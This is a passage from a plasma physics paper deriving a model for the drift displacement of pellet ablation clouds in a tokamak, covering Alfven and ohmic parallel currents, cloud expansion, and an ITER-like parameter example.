\(-\hat{Y}\), which is nearly vertical. As the electric field rises in this early stage, \(\mathbf{j}_{\hat{E}}\) evolves to point in the \(\hat{Y}\) direction everywhere in the cloud. Later the \(j_{\parallel}\) term starts to dominate over \(\mathbf{j}_{\hat{E}}\) in balancing \(\mathbf{j}_{\nabla B}\), setting the quasi-steady speed of the plasmoid. We may integrate (4) over some convenient volume \(V\) with boundary \(\partial V\), and apply the divergence theorem to obtain \[0=\int_{\partial V}\left[\left(\frac{\rho}{B}\frac{d\mathbf{v}}{dt}-\frac{2p}{BR_ {m}}\hat{Y}\right)+j_{\parallel}\mathbf{b}\right]\cdot\hat{n}dS, \tag{5}\] where \(\hat{n}\) is a unit vector pointing outwards from \(V\). We align the integration volume \(V\) with the cloud by choosing it to be a magnetic flux tube extending along the length of the cloud. Since the magnetic field lines are curved, the end faces of the flux tube, which we denote by \(\delta S\), are not quite parallel. We choose the flux tube to have rectangular cross section with the lower boundary running through the middle of the cloud, separating the upper, red, and lower, blue, parts of the cloud shown in Fig. 1, where the integration volume \(V\) is sketched. The length of the cloud along the field line is \(L_{\rm cld}\), and the upper boundary of the domain is located just above the cloud. For simplicity, we assume that the pellet is injected in the horizontal midplane and therefore (by symmetry) is always located in the middle of the cloud in the direction along the magnetic field and in the vertical direction. The surface normal \(\hat{y}\) of the lower surface of \(V\) coincides with \(\hat{Y}\) in the poloidal plane that contains the pellet, and rotates in the poloidal plane as one follows the field line along the flux tube \(V\). The relation between \(\hat{y}\), \(\hat{Y}\) and \(\hat{R}\) is \[\hat{y}=\cos\theta\,\hat{Y}+\sin\theta\,\hat{R}, \tag{6}\] where \(\theta\approx\varphi/q\approx z/qR_{\rm m}\) is the poloidal angle, \(\varphi\) is the toroidal angle and \(z\) is the coordinate along the magnetic field lines; we take \(z=0\) in the poloidal plane of the pellet. The dimensions of the integration volume in the \(\hat{R}\) and \(\hat{y}\) directions are \(\Delta R\) and \(\Delta y\), respectively. Figure 1: Schematic views of the ablation cloud and the field lines connecting the various parts of it from different perspectives; the green lines indicate the boundaries of the integration volume \(V\): a) parallel currents and magnetic drift currents indicated in the \(y-z\) plane, b) from the side looking in the toroidal direction, c) from the top and d) with unwrapped field lines (black dashed), connecting different parts of the cloud after a distance \(L\). The cloud expands at the speed of sound \(c_{s}\) in both directions, so that \(L_{\rm cld}=2c_{s}t\). We assume the pellet ablation cloud to be symmetric in \(z\) (and \(y\)) with respect to the \(y\) (\(z\)) axis in figure a). The pellet is indicated in figures b) and c) by the black dot, from which the cloud diverges. The contribution from the first term, \(\mathbf{j}_{\hat{\mathbf{E}}}\), to (5) thus becomes \[I_{\hat{\mathbf{E}}}=\int_{-L_{\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\int_{0}^{ \Delta R}-\frac{\rho}{B^{2}}\frac{dE_{y}}{dt}\hat{y}\cdot\hat{y}dRdz=-\frac{ \bar{n}\langle m_{i}\rangle\Delta R}{(1+\langle Z\rangle)B^{2}}\frac{dE_{y}}{ dt}, \tag{7}\] where we have noted that the field-line-integrated mass density is \(\bar{n}\langle m_{i}\rangle/(1+\langle Z\rangle)\) (neglecting the mass of the electrons), \(\bar{n}=\sum_{i}\bar{n}_{i}+\bar{n}_{e}=\sum_{i}\bar{n}_{i}(1+\langle Z\rangle)\) is the field-line integrated total density of all species (including electrons) inside the cloud (with \(\bar{n}_{i}\) and \(n_{e}\) denoting the field line integrated density of ion species \(i\) and electrons, respectively), \(\langle m_{i}\rangle\) is the average ion mass inside the cloud and \(\langle Z\rangle\) is the average ion charge inside the cloud. Considering the second term, \(\mathbf{j}_{\hat{\mathbf{V}}B}\), we assume that the pressure is constant along the field lines inside the cloud, with equal electron and ion temperatures, denoted by \(T\). The contribution from the second term of (5) then becomes \[I_{\hat{\mathbf{V}}B} = \int_{-L_{\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\int_{0}^{\Delta R }\frac{2(p-p_{\mathrm{bg}})}{BR_{\mathrm{m}}}\hat{Y}\cdot\hat{y}dRdz=\int_{-L_ {\mathrm{cld}}/2}^{L_{\mathrm{cld}}/2}\frac{2(p-p_{\mathrm{bg}})\Delta R}{BR_ {\mathrm{m}}}\cos{\left(\frac{z}{qR_{\mathrm{m}}}\right)}dz \tag{8}\] \[= \frac{4(p-p_{\mathrm{bg}})\Delta Rq}{B}\sin{\left(\frac{L_{ \mathrm{cld}}}{2qR_{\mathrm{m}}}\right)}=\frac{4(\bar{n}T-L_{\mathrm{cld}}n_{ \mathrm{bg}}T_{\mathrm{bg}})\Delta Rq}{BL_{\mathrm{cld}}}\sin{\left(\frac{L_{ \mathrm{cld}}}{2qR_{\mathrm{m}}}\right)},\] The background pressure \(p_{\mathrm{bg}}\) enters via the contribution from the upper surface of the integration volume. We see, as noted in the introduction, that the assumptions simplifying the parallel structure of the cloud will quantitatively affect the final results, but accounting for parallel structure will not affect the essential qualitative description of the plasmoid motion. The key to calculating how the parallel current contributes to the drift motion is to find the relation between the parallel current \(j_{\parallel}\), which flows through the background plasma (beyond the ends of the cloud), and the electric field responsible for \(\mathbf{E}\times\mathbf{B}\) motion, which are related via the electrostatic potential \(\phi\) along the plasmoid length. As the pellet flies through the plasma, it undergoes continuous ablation and thus generates a sequence of ablation clouds residing on different field lines. Each of these clouds expands along the magnetic field whilst drifting across it. It is important to note that the cloud drift velocity exceeds the speed of the pellet. We can thus regard the pellet as stationary, which simplifies our discussion. With these facts in mind, we now study the evolution of the electrostatic potential along each field line. We fix our attention on one particular field line and denote by \(\tau\) the time that has elapsed since pellet material first arrived there. This time is in general different from the time \(t\) that has passed since this material was originally ablated from the pellet. (Alternatively, in the limit of very high electrical conductivity, it is possible to regard the field lines as "frozen into" the pellet cloud, in which case it is better to consider a field line moving with the pellet cloud. In this case \(t=\tau\).) It is convenient to introduce \(L\), the distance along a field line, outside the cloud, which connects the two ends of the cloud; note that \(L\) depends on the coordinates identifying a field line and may be different for different field lines in our integration volume \(V\). In our large-aspect-ratio approximation, the value of \(L=2\pi R_{\mathrm{m}}N\) is equal to the circumference of the torus, \(2\pi R_{\mathrm{m}}\), times the number of turns, \(N\), after which the field line connects the two end caps of \(V\). This number will in general vary over the cross section of the flux tube. The evolution of the electrostatic potential along a field line connecting the oppositely charged parts of the cloud after a length \(L\) is illustrated in figure 2. The physical picture of the evolution of this potential is the following: the interface between the end of the plasmoid and the background plasma represents an evolving perturbation, expanding along the field lines at the local sound speed \(c_{s}\) of the pellet material inside the plasmoid. The potential difference between the cloud and the background plasma, along with the plasmoid drift, excite shear Alfven waves, which are emitted from these interfaces and propagate away from the plasmoid, along field lines through the background plasma, at the local Alfven speed, \(C_{A}\). For \(\tau\ll L/(2C_{A})\), the potential perturbations associated with the Alfven waves will not have reached each other yet. Thus, the current carried away from the ends of the cloud is determined by the polarisation current resulting from the time-varying potential at the wave fronts, giving rise to the Alfven current (Scholer, 1970). When \(\tau=L/(2C_{A})\), the waves emerging from the opposite sides of the cloud meet and interfere with each other. Eventually, a steady-state, without propagating waves, is reached when \(\tau\gg L/(2C_{A})\). At this stage, the parallel current is instead determined by Ohm's law. Thus, the dominant contribution to the \(j_{\parallel}\) current, in the initial phase, is associated with the Alfven wave propagating from the ends of the drifting cloud (Parks _et al._, 2000). It is proportional to the electric field inside the cloud, as outlined below, and can be described by the so-called Alfven conductivity, \(\Sigma_{A}=1/R_{A}=1/(\mu_{0}C_{A})\). In the later stages, the ohmic current along the field lines connecting the oppositely charged parts of the cloud (Pegourie _et al._, 2006) becomes dominant. There is also a contribution to the current caused by the drift resulting from the cloud viscosity, which has been shown by Rozhansky _et al._ (2004) to be less significant and will be neglected here. ### Parallel current When calculating the contribution of \(j_{\parallel}\) to the integral (5), only the end caps (area \(\delta S\)) of this flux tube will contribute, as otherwise \(\mathbf{b}\cdot\hat{n}=0\). Consider first the contribution from a smaller flux tube, whose end caps have area \(\partial s_{<}\), that only contains field lines for which \(C_{A}t\ll L/2\), that is, for which Alfven waves propagating from the ends of the cloud have not had time to meet. As the parallel electric field \(E_{\parallel}\) is small in the established hot background plasma outside the cloud, except at the wave front, we can express \(E_{\parallel}\) in Fourier space as \[E_{\parallel}=-ik_{\parallel}\phi+i\omega A_{\parallel}\approx 0,\] Figure 2: Sketch of the electrostatic potential \(\phi(z)\) along a field line connecting the two ends of the cloud, at different values of \(y\), characterised by potentials \(\phi_{A}\) and \(\phi_{B}\). We show three representative times: At \(\tau_{1}<L/(2C_{A})\) potential perturbations propagating out from the ends of the cloud at the Alfvén speed have not yet met along the field line (solid black line). The perturbations meet at \(\tau_{2}=L/(2C_{A})\) (dashed blue). After a long time (compared to Alfvén time scales), \(\tau_{3}\gg L/(2C_{A})\), the potential has reached a quasi-steady state where an ohmic current flows between the connected ends of the cloud (dash-dotted green). Note that the cloud length \(L_{\rm cld}\) is exaggerated in the figure; in reality it is much shorter than the distance along the field line between the connected ends of the cloud. and relate the electrostatic and vector potential via the Alfven speed \[A_{\parallel}=\phi/(\omega/k_{\parallel})=\phi/C_{A}.\] Using Ampere's law we can relate \(j_{\parallel}\) to \(A_{\parallel}\) and thence to \(\phi\) as \[j_{\parallel}=-\frac{\nabla_{\perp}^{2}A_{\parallel}}{\mu_{0}}=-\frac{\nabla_ {\perp}^{2}\phi}{\mu_{0}C_{A}}. \tag{9}\] Assuming that the whole cloud moves at the same radial velocity, the electric field \(E_{y}=-\partial\phi/\partial y\) must be constant inside the cloud, i.e. \[\nabla_{\perp}^{2}\phi=-E_{y}\left[\delta(y-\Delta y)-\delta(y+\Delta y)\right], \tag{10}\] where \(\delta\) denotes the Dirac delta function. If we set \(\partial s_{<}\) to the part of \(\partial S\) for which \(C_{A}t<L/2\), the contribution from the Alfven part of the parallel current becomes \[I_{\parallel,A} =2\int_{\partial s_{<}}\frac{-E_{y}\delta(y-\Delta y)}{\mu_{0}C_ {A}}dydR \tag{11}\] \[=-2\int_{0}^{\Delta R}\int_{0}^{\Delta y}\Theta(\partial s_{<};y, R)\frac{E_{y}\delta(y-\Delta y)}{\mu_{0}C_{A}}dydR\] (12) \[=-2P_{A}\Delta R\frac{E_{y}}{\mu_{0}C_{A}}=-2P_{A}\Delta R\frac{E _{y}}{R_{A}}, \tag{13}\] where the function \(\Theta(\partial s;y,R)\) is \(1\) for the \(y\) and \(R\) values corresponding to field lines crossing the surface \(\partial s\) where \(C_{A}t<L/2\) is satisfied, and zero otherwise; and \(P_{A}\) is the fraction \(\partial s_{<}/\partial S\). Now consider the field lines crossing the area \(\partial s_{>}\), i.e., the field lines for which \(C_{A}t\gg L/2\). On these field lines, the Alfven waves emanating from either side of the cloud have already met and decayed, and there is no longer any polarisation current. Only the ohmic current \(j_{\parallel}\) remains and, being divergence free, it must be constant along the field in the large-aspect-ratio limit. This current is related to the parallel electric field by Ohm's law, \[j_{\parallel}=\sigma_{\parallel}E_{\parallel}=-\sigma_{\parallel}\nabla_{ \parallel}\phi.\] As \(j_{\parallel}\) is constant along the field lines, so is \(\nabla\phi\), which means that \[j_{\parallel}=\sigma_{\parallel}E_{\parallel}=-\sigma_{\parallel}\frac{\phi- \phi_{B}}{L}=-\sigma_{\parallel}\frac{2E_{y}(y-y_{B})}{L}, \tag{14}\] where \(y\) denotes the vertical coordinate at which the field line emanates from one end of the cloud and \(y_{B}\) that where it hits the other end. The electric field \(E_{y}\) has been assumed to be constant along the field line. Let us now denote by \(\partial s_{i}\) the subset of \(\delta s_{>}\) containing only field lines connecting to the opposite side of the cloud after a distance \(L=2\pi R_{\rm m}i\), i.e. connecting after exactly \(i\) toroidal turns. If \(i\gg 1\), the connection is essentially random, so that the values of \(y\) and \(y_{B}\) are uncorrelated and \(\int y_{B}dy=0\). The total ohmic current flowing along field lines in \(\delta s_{i}\) thus becomes \[I_{\parallel,{\rm ohm}}^{(i)}(\tau\gg L/(2C_{A})) =-2\int_{\partial s_{i}}\sigma_{\parallel}\frac{E_{y}(y-y_{B})}{L }dydR\] \[=-2P_{i}\int_{0}^{\Delta y}\int_{0}^{\Delta R}\Theta(\partial s_{> };y,R)\sigma_{\parallel}\frac{E_{y}(y-y_{B})}{2\pi R_{\rm m}i}dydR\] \[=-P_{i}\sigma_{\parallel}\frac{E_{y}\Delta y^{2}\Delta R}{2\pi R _{\rm m}i}, \tag{15}\] where \(P_{i}=\delta s_{i}/\partial S\) is the fraction of the cloud connecting to the opposite side after \(i\) toroidal turns. This result is similar to the corresponding expression, Eq. (2), in (Commaux _et al._, 2010), up to an order unity factor accounting for the finite electron collision time. The total ohmic current is obtained by summing over all values of \(i\). For \(\tau\gtrsim L/(2C_{A})\), the current will make a transition from 0 to \(I_{\parallel,\mathrm{ohm}}^{(i)}(\tau\gg L/(2C_{A}))\)1over a time scale similar to \(L/C_{A}\), so that we can write Footnote 1: This only applies to field lines in the interior of \(\partial S\); at the boundary of \(\partial S\) the initial current is \(I_{\parallel,A}\). However, as the ohmic current is proportional to the cross section area, the boundary of \(\partial S\) gives a negligible contribution to the ohmic current. \[I_{\parallel,\mathrm{ohm}}=\sum_{i=1}^{\infty}f\left(\frac{\tau}{L/(2C_{A}) }\right)I_{\parallel,\mathrm{ohm}}^{(i)}(\tau\gg L/(2C_{A})), \tag{16}\] where \(f(0)=0\) and \(f\to 1\) for large arguments. The detailed form of \(f\) is determined by the interaction of the Alfven waves propagating from opposite sides of the cloud, which is outside the scope of the present work. Here we instead make the approximation that \(f=\theta\left(\frac{\tau}{L/(2C_{A})}-1\right)\), where \(\theta\) is the Heaviside step-function. This is also used in Pegourie _et al._ (2006). Note that this assumption on \(f\) underestimates the time until the onset of the ohmic current, thus overestimating the importance of the ohmic current contribution. With this assumption for \(f\), we can write the total ohmic current as \[I_{\parallel,\mathrm{ohm}}=\sum_{i=1}^{N}I_{\parallel,\mathrm{ohm}}^{(i)}( \tau>L/(2C_{A})), \tag{17}\] where \(N=\lfloor 2C_{A}\tau/(2\pi R_{\mathrm{m}})\rfloor=\lfloor\tau/t_{0}\rfloor\) is the maximum number of toroidal turns the Alfven wave front has had time to make, with \(t_{0}\) the time for the Alfven wave to propagate one turn around the torus, accounting for the fact that emission is from both ends of the cloud. The notation \(\lfloor x\rfloor\) gives the greatest integer less than or equal to \(x\). #### 2.1.1 Fraction of the cloudlet cross section connected to the opposite side The fraction \(P_{i}\) of the cloudlet cross-section that connects to the opposite side during the \(i^{\mathrm{th}}\) turn can be calculated as follows. As we shall see, most of the contribution to the current comes from terms with \(i\gg 1\), i.e., from field lines that encircle the torus many times before connecting the two ends of the cloud. According to Weyl's lemma (Helander, 2014), whether a given field line starting from one side of the cloud connects to the other side in a large number of turns is essentially random. We can thus speak of the probability of such a connection, and this probability depends on the fraction of the poloidal cross-section that the cloudlet covers, which is \(\Delta y/(\pi r)\), where \(r\) is the characteristic minor radius at the cloudlet position. Therefore, the total connected fraction \(P_{\mathrm{con}}^{\mathrm{tot}}\) increases between turn \(N\) and \(N+1\) in the following way: \[P_{\mathrm{con}}^{\mathrm{tot}}(N+1)-P_{\mathrm{con}}^{\mathrm{tot}}(N)= \frac{\Delta y}{\pi r}(1-P_{\mathrm{con}}^{\mathrm{tot}}(N)). \tag{18}\] The solution of this difference equation is \[P_{\mathrm{con}}^{\mathrm{tot}}(N)=1-\left(1-\frac{\Delta y}{\pi r}\right)^{N}, \tag{19}\] and we can now express \[P_{i}=P_{\mathrm{con}}^{\mathrm{tot}}(i+1)-P_{\mathrm{con}}^{\mathrm{tot}}(i) =\frac{\Delta y}{\pi r}\left(1-\frac{\Delta y}{\pi r}\right)^{i}. \tag{20}\] This estimate is consistent with figure 3 in (Pegourie et al., 2006). We can also express the fraction \(P_{A}\) (determining the size of the Alfven current) as \(P_{A}=1-P_{\rm con}^{\rm tot}\). Combining equation (15), (17) and (20), the ohmic current contribution can now be expressed as \[I_{\parallel,{\rm ohm}}=-\sum_{i=1}^{N}P_{i}\sigma_{\parallel}\frac{E_{y} \Delta y^{2}\Delta R}{2\pi R_{\rm m}i}=-\frac{E_{y}\Delta R}{R_{\rm eff}}, \tag{21}\] with the inverse effective resistivity \(1/R_{\rm eff}\) given by \[\frac{1}{R_{\rm eff}}=\sum_{i=1}^{N}P_{i}\sigma_{\parallel}\frac{\Delta y^{2} }{2\pi R_{\rm m}i}=\sigma_{\parallel}\frac{\Delta y^{3}}{2\pi R_{\rm m}\pi r} \sum_{i=1}^{N}\frac{1}{i}\left(1-\frac{\Delta y}{\pi r}\right)^{i}. \tag{22}\] For \(N\to\infty\) we may use \(\sum_{i=1}^{\infty}(1-x)^{i}/i=-\ln x\), giving \[\frac{1}{R_{\rm eff}}=\sigma_{\parallel}\frac{\Delta y^{3}}{2\pi^{2}R_{\rm m} r}\ln\frac{\pi r}{\Delta y}. \tag{23}\] Concerning when the \(N\to\infty\) limit is meaningful to take, we must appreciate that depending on the resistivity of the cloud, the cloud may or may not be frozen into the magnetic field, which determines whether field lines are dragged along with the cloud, or the field lines slip with respect to the cloud1. It is worth re-iterating that the generation of Alfven waves by the propagating potential perturbation - and so the existence of Alfven resistivity - does not require the field lines to be frozen in on the drift time scale. Footnote 1: Fig. 3 of (Hoare et al., 2019) is a nice example from the scrape-off layer filament literature of exploring this transition numerically. As we will see later, the number of connected turns \(N\) becomes large during the drift motion, so that taking \(N\to\infty\) is a valid approximation for the majority of the drift motion, as long as the magnetic field diffusion is slow enough (i.e. the cloud temperature is high enough) that the cloud does not become disconnected from the field lines where the electrostatic potential has been set up. The picture becomes more complicated if the magnetic field diffusion time scale is fast compared to the drift motion. This is typically the case for low cloud temperatures (e.g. pellets doped with highly radiating impurities), where the conductivity in the cloud is low and the resistive diffusion coefficient is large. In this case, the potential along a given field line will not only be determined by the local cloud properties, but will be affected by all material which has drifted past the field line under consideration. When pellet material first arrives, the Alfven current dominates. On the other hand, long after the ablation flow started to cross a given field line, the potential along this field line will reach a quasi-stationary profile similar to the case when the field line remains frozen into the cloud for a long time, and thus \(N\to\infty\) also in this case. As the pellet motion is typically slow compared to the other processes of interest, the latter limit should dominate for the majority of the ablated material in most cases even for low cloud temperatures. The fraction of connected field lines, \(P_{A}\), converges somewhat slower than the effective resistivity \(R_{\rm eff}\). We therefore keep \(N\) finite in the expression for \(P_{A}\) for hot clouds. For cold clouds, for the first material drifting past a new part of the background plasma \(N\) remains equal to zero, and \(P_{A}=1\). However, as the potential reaches its quasi-stationary value, \(P_{A}\to 0\) for the whole drift motion (i.e. the parallel current will be dominated by the ohmic component). ### Current balance We are now finally ready to sum up the various contributions to the current balance and obtain an equation for \(E_{y}\) in terms of the parameters characterising the pellet cloud and the background plasma. From equation (5) we have \[\begin{split} 0&=\frac{I_{\nabla B}+I_{\dot{\mathbf{E}}}+I_{ \parallel,A}+I_{\parallel,\text{ohm}}}{\Delta R}\\ &=\frac{4(\bar{n}T-L_{\text{cld}}n_{\text{bg}}T_{\text{bg}})q}{ BL_{\text{cld}}}\sin\left(\frac{L_{\text{cld}}}{2qR_{\text{m}}}\right)-\frac{\bar{n} \langle m_{i}\rangle}{(1+\langle Z\rangle)B^{2}}\frac{dE_{y}}{dt}-2P_{A}\frac{ E_{y}}{R_{A}}-\frac{E_{y}}{R_{\text{eff}}},\end{split} \tag{24}\] Note that the factor \(\sin\left(\frac{L_{\text{cld}}}{qR_{\text{m}}}\right)\) will start to oscillate when \(t\sim qR_{\text{m}}/c_{s}\), as \(L_{\text{cld}}\sim c_{s}t\), and the amplitude of the term in which this appears in (24) decreases as \(1/L_{\text{cld}}\propto 1/t\); this oscillation, together with the pressure equilibration (which occurs when \(\bar{n}T=L_{\text{cld}}n_{\text{bg}}T_{\text{bg}}\)), effectively sets the time scale of the drift duration and eventually leads to a finite displacement for the drift. Also note that \(c_{s}t_{0}/qR_{\text{m}}\sim c_{s}/C_{A}\) is small for typical fusion plasma parameters, meaning that \(N\) becomes large during the drift duration, motivating us to take the upper limit of the sum in (22) to be infinite, when calculating \(R_{\text{eff}}\). If the plasmoid and background plasma properties do not depend on \(E_{y}\), equation (24) becomes a linear first-order ordinary differential equation in \(E_{y}\), which can be written in the form \[\frac{dE_{y}}{dt}+g(t)E_{y}=f(t), \tag{25}\] with \[g(t)=\frac{(1+\langle Z\rangle)B^{2}}{\bar{n}\langle m_{i}\rangle}\left(2P_{A }\frac{1}{R_{A}}+\frac{1}{R_{\text{eff}}}\right) \tag{26}\] and \[f(t)=\frac{4(1+\langle Z\rangle)B}{\langle m_{i}\rangle L_{\text{cld}}}\left( T-\frac{L_{\text{cld}}n_{\text{bg}}}{\bar{n}}T_{\text{bg}}\right)q\sin\left( \frac{L_{\text{cld}}}{2qR_{\text{m}}}\right) \tag{27}\] This equation can be solved by using an integrating factor \(e^{G(t)}\), so \[E_{y}=e^{-G(t)}\left(E_{y0}+\int_{0}^{t}e^{G(t)}f(t)dt\right), \tag{28}\] where \(E_{y0}=E_{y}(t=0)\) and \(G(t)=\int_{0}^{t}g(t)dt\). For a hot cloud, we have \[\begin{split} G(t)&=\frac{(1+\langle Z\rangle)B^{2}}{ \bar{n}\langle m_{i}\rangle}\left(2\left[1-\left(1-\frac{\Delta y}{\pi r} \right)^{N+1}\right]\frac{\pi r}{\Delta y}\frac{t_{0}}{R_{A}}+\frac{t}{R_{ \text{eff}}}\right)\\ &=2\left[1-\left(1-\frac{\Delta y}{\pi r}\right)^{N+1}\right] \frac{\pi r}{\Delta y}\frac{R_{\text{eff}}}{R_{A}}\frac{t_{0}}{t_{\text{acc} }}+\frac{t}{t_{\text{acc}}},\end{split} \tag{29}\] where we have defined \[t_{\text{acc}}=\frac{\bar{n}\langle m_{i}\rangle R_{\text{eff}}}{(1+\langle Z \rangle)B^{2}}. \tag{30}\] This is the characteristic acceleration time scale if the ohmic current dominates over the Alfven current; if \(R_{\text{eff}}/R_{A}\) is small (corresponding to a hot background plasma), or in the case of a cold cloud long after the ablation flow started to cross the local field line, the expression (29) reduces to \[G(t)=\frac{t}{t_{\rm acc}}. \tag{31}\] For a cold cloud shortly after the ablation flow started at the local field line, where \(P_{A}=1\), equation (29) reduces to the same expression but with \(R_{\rm eff}\) replaced with \(R_{A}\) in the expression for \(t_{\rm acc}\). Finally, as the radially outward drift velocity of the cloudlet is due to the \({\bf E}\times{\bf B}\) motion, it can be estimated as \(E_{y}/B\). Time integration leads to an expression for the net radial displacement \[\Delta r=\frac{1}{B}\int_{0}^{\infty}E_{y}{\rm d}t. \tag{32}\] ## 3 Parallel expansion and the final drift displacement In this section, we complete the description of the pellet cloud by defining the density source resulting from pellet ablation. We then evaluate the drift of the pellet cloud, demonstrating its dependence on pellet composition and background plasma temperature. ### Model for the line-integrated density and cloud expansion The line-integrated density can be determined based on an estimate of how many particles the cloud contains when it detaches from the pellet source. The latter can be obtained as the product of the ablation rate and the time during which the pellet source is ablating inside the cloud. A widely used estimate for the mass ablation rate is given by \[{\cal G}=\lambda(X)\left(\frac{T_{\rm keV}}{2}\right)^{5/3}\left(\frac{r_{p}} {r_{p0}}\right)^{4/3}n_{e20}^{1/3},\] where \(\lambda(X)=[27.1+\tan{(1.48X)}]/1000\) kg/s, \(T_{\rm keV}\) is the background electron temperature in keV, \(r_{p}\) is the pellet radius, \(r_{p0}=2\) mm and \(n_{e20}\) is the background electron density in units of \(10^{20}\) m\({}^{-3}\) (Parks 2017). This expression is based on a version of the Neutral Gas Shielding (NGS) model (Parks & Turnbull 1978) that allows the pellet material to have both hydrogenic and noble gas components. To determine the average detachment time (during which the pellet source contributes to the cloud), we estimate the initial acceleration \(\dot{v}_{0}=\dot{v}(t=0)=E_{y}(t=0)/B\) by balancing the first two terms in the current balance equation (24). The last two terms in (24) can be neglected, since in the initial phase, \(E_{y}\) is small. The time derivative of the electric field then becomes \[\frac{dE_{y}}{dt}=\frac{2B(1+\langle Z\rangle)}{\bar{n}\langle m_{i}\rangle R _{\rm m}}\left(\bar{n}T-L_{\rm cld}n_{\rm bg}T_{\rm bg}\right),\] so that the initial acceleration is \[\dot{v}_{0}=\frac{1}{B}\frac{dE_{y}}{dt}=\frac{2(1+\langle Z\rangle)}{\langle m _{i}\rangle R_{\rm m}}\left(T_{0}-\frac{n_{\rm bg}}{n_{0}}T_{\rm bg}\right), \tag{33}\] where \(n_{0}=\bar{n}/L_{\rm cld}\) is the initial cloud density and \(T_{0}\) is the initial temperature. Initially, the pellet cloud is neutral, and it expands radially, but as soon as the particles are ionized, the expansion will continue along the magnetic field lines. The initial parallel expansion takes place at the speed of sound at a temperature of approximately \(T_{0}\) (which is of the order of a few eV), and starts from a spherical cloud of cross section area \(\pi\Delta y^{2}\). We can therefore estimate the density from mass conservation according to \[\mathcal{G}=2n_{0}\langle m_{i}\rangle c_{s}(T_{0})\pi\Delta y^{2}\Rightarrow n_{ 0}=\frac{\mathcal{G}}{2\langle m_{i}\rangle c_{s}(T_{0})\pi\Delta y^{2}}. \tag{10}\] The average distance the ablated material must drift before it exits the initial expansion tube around the pellet is \(\Delta y\). Assuming that the initial motion has a constant acceleration we find \[\Delta y=v_{0}t_{\rm det}+\dot{v}_{0}t_{\rm det}^{2}/2,\] and the average detachment time thus becomes \[t_{\rm det}=-\frac{v_{0}}{\dot{v}_{0}}+\sqrt{\left(\frac{v_{0}}{\dot{v}_{0}} \right)^{2}+\frac{2\Delta y}{\dot{v}_{0}}}, \tag{11}\] where \(v_{0}=v_{p}\) is the initial cloud velocity relative to the pellet, which is equal in magnitude but opposite in sign to the pellet velocity (assuming the cloud would be frozen in to the field lines where it was ablated in the absence of the \(E\times B\) acceleration). During the detachment time \(t_{\rm det}\) the cloud expands to a length \[L_{c}=2c_{s}(T_{0})t_{\rm det}, \tag{12}\] which serves as an initial condition for the cloud length for the remainder of the drift motion. The line-integrated density is thus \[\bar{n}=\frac{\mathcal{G}t_{\rm det}}{\langle m_{i}\rangle\pi\Delta y^{2}}. \tag{13}\] When the cloud detaches from the pellet, the temperature initially rises quickly due to the heating from hot electrons in the background plasma, but the details depend on the density and composition of the cloud. At low densities, the mean free path of the background-plasma electrons in the cloud is longer than the cloud itself. These electrons thus pass through the cloud and heat it relatively uniformly (Aleynikov et al., 2019; Runov et al., 2021; Arnold et al., 2021). Most of the literature, however, considers the opposite limit of a dense cloud, where the stopping power is so great that the hot electrons cannot easily pass through it. We only consider this case but note that it becomes inapplicable at low cloud densities and high background-plasma temperatures. The heating also depends on the pellet composition; if the pellet contains even a small amount of a high-Z radiative component, the radiation from the pellet cloud quickly reaches a balance with the heating from the background plasma, and therefore the temperature rises far more slowly (Matsuyama, 2022). For pure hydrogen pellets, on the other hand, the radiation is too weak to have a major impact on the energy balance, and then the cloud temperature will relatively quickly increase to several tens of eV. The dependence of the cloud temperature on the background plasma temperature will be rather weak, as a higher background plasma temperature means both an increased heating and an increased ablation rate, giving more particles to absorb and, in the case of a high-Z-doped pellet, radiate away the energy. The heat flux scales as \(q_{\rm bg}\sim T_{\rm bg}^{3/2}\) (neglecting any scaling of the cloud cross section area with the temperature), and the ablation rate scales as \(\mathcal{G}\sim T_{\rm bg}^{5/3}\), so that the cloud temperature scales as \(T\sim q_{\rm bg}/\mathcal{G}\sim T_{\rm bg}^{-1/6}\), i.e. a very weak scaling. Typical values for the cloud temperature, based on the results presented in Matsuyama (2022), are \(T=5\,\)eV for neon doped pellets and \(T=30\,\)eV for pure hydrogen pellets. In the following we will assume the cloud temperature is constant during the drift motion and is independent of the background plasma temperature. This approximation is, of course, quite crude but not more so than other simplifications we have employed. Finally, as long as the cloud pressure is much higher than the background plasma pressure, the cloud will expand by approximately the speed of sound inside the cloud, \(c_{s}\approx\sqrt{(\gamma_{e}\langle z\rangle+\gamma_{i})T/\langle m_{i}\rangle}\), with \(\gamma_{e}=1\) and \(\gamma_{i}=3\), and will slow down when the cloud pressure becomes comparable to the background plasma pressure. Here we assume that the expansion speed is equal to \(c_{s}\) as long as the cloud pressure is higher than the background plasma pressure, and then stops immediately when the cloud pressure becomes equal to the background plasma pressure, i.e. \[L_{\rm cld}\approx L_{c}+2c_{s}{\rm min}(t,t_{\rm pe}), \tag{12}\] where the pressure equilibration time is \[t_{\rm pe}=\frac{T\bar{n}}{2c_{s}n_{\rm bg}T_{\rm bg}}. \tag{13}\] With the parallel dynamics model presented here, we have all the details needed to evaluate the electric field inside the cloud, and the drift displacement can be calculated by evaluating the integral in (32). Analytical expressions for the drift displacement in various limits are given in Appendix A. ### Calculation of the drift distance in an ITER-like scenario We now evaluate the above expressions for the drift displacement for parameters of interest in an ITER-like scenario, similar to that studied by Matsuyama (2022). In this scenario, the drifting pellet cloud is ablated from a pellet shard with radius \(r_{\rm p}=2\,{\rm mm}\) located at major radius \(R_{\rm m}=5\,{\rm m}\) and travelling with a speed of \(v_{0}=500\,{\rm m/s}\) towards the high field side (i.e. the injection is from the low-field side). We also assume that the cloud is initially stationary in the lab frame, so that \(E_{y0}=0\). The background plasma has a free electron density of \(n_{\rm bg}=10^{20}\,{\rm m}^{-3}\) and the magnetic field strength is \(B=5\,{\rm T}\). Moreover, we set \(q=1\), \(\Delta y=1.25\,{\rm cm}\), (based on simulation results by Matsuyama (2022)) and the average charge for the neon is approximately \(\langle Z_{\rm Ne}\rangle\approx 2\) at 5 eV. The background plasma temperature \(T_{\rm bg}\) and the pellet composition will be varied. Matsuyama (2022) uses a model similar to that used by Pegourie (2007), adapted to mixed neon-deuterium pellets, including a Neutral Gas and Plasma Shielding (NGPS) model for the pellet ablation and a volume-averaged single-cell Lagrangian model for the parallel expansion. However, Matsuyama (2022) only considers the early stages of the drift motion during the first \(130\,\mu{\rm s}\) after the cloud has detached from the pellet, for a single isolated cloud, and does therefore not include the effect of ohmic currents and rotational transform. Thus, the model by Matsuyama (2022) accounts for the same physical mechanisms concerning the drift motion as ours in the case of a cold cloud shortly after the ablation flow 